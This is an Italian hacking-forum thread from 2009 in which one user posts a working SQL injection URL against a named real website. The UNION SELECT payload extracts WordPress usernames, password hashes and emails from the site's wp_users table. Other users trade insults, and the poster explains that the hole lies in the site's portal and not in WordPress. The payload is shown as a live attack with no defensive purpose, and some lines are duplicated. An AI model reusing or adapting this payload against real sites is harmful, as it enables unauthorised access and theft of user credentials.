I imported_Bronsa Utente Silver 28 Ottobre 2007 108 6 0 82 12 Agosto 2009 #1 Codice: http://www.sanmarinosite.com/news_dett.php?news_id=-1%20union%20all%20select%201,2,CONCAT_WS(CHAR(32,58,32),user_login,user_pass,user_email),4,5,6,7%20from%20wp_users
Codice: http://www.sanmarinosite.com/news_dett.php?news_id=-1%20union%20all%20select%201,2,CONCAT_WS(CHAR(32,58,32),user_login,user_pass,user_email),4,5,6,7%20from%20wp_users
F fojeaf Utente Silver 3 Marzo 2008 235 8 0 95 12 Agosto 2009 #2 bronsa è sempre + haxor.. una sql che printa un errore.. ok.. sai che roba..
I imported_Bronsa Utente Silver 28 Ottobre 2007 108 6 0 82 12 Agosto 2009 #3 malex se sei ghei non è colpa mia... lo vedo che ci sono dei caratteri strani tra use​r e _email ? levali... colpa del tag code =) FAIL
malex se sei ghei non è colpa mia... lo vedo che ci sono dei caratteri strani tra use​r e _email ? levali... colpa del tag code =) FAIL
B BrainStorm Utente Silver 29 Novembre 2008 46 1 1 62 12 Agosto 2009 #4 Ma è una SQL Injection di WordPress. Non era già conosciuta??? :-/
I imported_Bronsa Utente Silver 28 Ottobre 2007 108 6 0 82 12 Agosto 2009 #5 non è una sql inj di wp.... tramite una vulnerabilità del sito ho semplicemente estratto i dati di wp ma la vulnerabilità non è in wp ma nel portale...
non è una sql inj di wp.... tramite una vulnerabilità del sito ho semplicemente estratto i dati di wp ma la vulnerabilità non è in wp ma nel portale...
B BrainStorm Utente Silver 29 Novembre 2008 46 1 1 62 12 Agosto 2009 #6 Ah, ok tutto chiaro. :sleepy:
